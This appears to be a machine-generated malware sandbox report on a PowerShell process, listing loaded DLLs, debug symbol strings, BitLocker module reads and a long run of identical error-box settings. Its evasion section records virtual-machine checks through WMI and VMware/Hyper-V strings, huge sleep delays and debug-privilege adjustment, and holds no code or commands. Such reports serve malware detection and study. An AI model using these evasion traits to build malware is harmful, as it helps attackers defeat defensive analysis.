Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1373186904.0000022C11518000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1410473801.0000022C2B590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1410473801.0000022C2B61C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1414936294.0000022C2B98C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32a source: powershell.exe, 00000000.00000002.1373186904.0000022C11518000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb1MC source: powershell.exe, 00000000.00000002.1410473801.0000022C2B61C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1413276114.0000022C2B89E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1412457364.0000022C2B7EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1410473801.0000022C2B590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1414936294.0000022C2B98C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb, source: powershell.exe, 00000000.00000002.1413763000.0000022C2B8E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.1410473801.0000022C2B5ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdb-Mo source: powershell.exe, 00000000.00000002.1410473801.0000022C2B61C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC34D2A5 pushad ; iretd 0_2_00007FFAAC34D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC46B27F pushad ; ret 0_2_00007FFAAC46B2A1

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5860Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4024Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.1373706201.0000022C145F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1373706201.0000022C145F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1373706201.0000022C140A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1373706201.0000022C145F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware0
Source: powershell.exe, 00000000.00000002.1373706201.0000022C145F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`S/
Source: powershell.exe, 00000000.00000002.1373706201.0000022C145F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1373706201.0000022C145F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1373706201.0000022C140A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1373706201.0000022C140A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1413763000.0000022C2B92C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus@g
Source: powershell.exe, 00000000.00000002.1373706201.0000022C145F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.1414936294.0000022C2B96E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
